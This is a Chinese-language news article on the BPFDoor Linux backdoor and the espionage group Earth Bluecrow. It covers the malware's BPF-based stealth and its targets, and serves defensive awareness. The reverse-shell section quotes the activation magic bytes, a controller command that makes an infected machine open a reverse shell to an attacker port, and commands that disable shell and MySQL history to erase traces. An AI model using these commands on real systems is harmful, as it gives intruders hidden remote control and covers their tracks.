一种名为 BPFDoor 的复杂后门恶意软件一直在积极攻击亚洲、中东和非洲地区的多个组织,它利用先进的隐身技术来躲避检测。
这种基于 Linux 系统的后门程序利用伯克利数据包过滤(BPF)技术在内核层面监控网络流量,使其在保持对受感染系统的持续访问权限的同时,能够躲过传统的安全扫描。
据观察,BPFDoor 的攻击目标包括电信、金融和零售行业,近期在韩国、缅甸、马来西亚和埃及都有相关攻击记录。
该恶意软件无需监听网络端口就能运行,这使得使用端口扫描等传统安全措施很难检测到它,从而使其能够长时间不被发现。
Trend Micro 的研究人员指出,这些攻击背后的威胁行为者是 Earth Bluecrow(也被追踪记录为 Red Menshen),这是一个高级持续性威胁(APT)组织,一直在使用 BPFDoor 进行网络间谍活动。
根据他们的监测数据,该组织至少已经活跃了四年,有证据表明早在 2021 年就发生过多起相关事件。
这种恶意软件的设计使其能够将 BPF 过滤器注入操作系统内核,在那里它可以检查网络数据包,并在触发特定后门功能的预定字节模式时激活。
这种类似 rootkit(内核级恶意软件)的能力使 BPFDoor 能够融入系统,它会更改进程名称,并采用其他躲避检测的策略。
对于受到 BPFDoor 攻击的组织来说,后果非常严重。这个后门为威胁行为者创建了一个持续存在且几乎隐形的通道,使其能够长时间访问敏感数据和系统,使其成为长期间谍活动的理想工具。
反向 Shell 机制:隐藏的控制手段
BPFDoor 功能的核心是其控制模块,它使攻击者能够与受感染的主机建立反向 Shell 连接。
这一功能使威胁行为者能够更深入地渗透到受感染的网络中,便于进行横向移动,并访问更多的系统和敏感数据。
控制模块会发送包含魔法字节(例如用于 TCP 协议的 0x5293 或用于 UDP 协议的 0x7255)、目标要连接的远程 IP 地址和端口,以及一个身份验证密码的激活数据包。
当配置正确时,这会从受害者计算机向攻击者的系统发起一个反向 Shell 连接。
./controller -cd 22 -h 192.168.32.156 -ms 8000
这条命令指示控制模块要求受感染的机器(192.168.32.156)向攻击者机器的 8000 端口发起反向 Shell 连接。
恶意软件的编写者采取了一些措施来消除他们在受感染系统上的活动痕迹:
export MYSQL_HISTFILE=/dev/null
export HISTFILE=/dev/null
这些命令会禁用命令历史记录功能,这表明攻击者专门针对运行 MySQL 数据库软件的系统。
对于网络安全防御者来说,检测 BPFDoor 仍然具有挑战性,因为它能够跨多种协议(TCP、UDP 和 ICMP)运行,而且攻击者可以很容易地修改用于激活的魔法字节序列。
随着这种威胁的不断演变,各组织必须实施先进的监控解决方案,以便能够检测到与 BPFDoor 通信和激活序列相关的特定模式。
发表评论
您还未登录,请先登录。
登录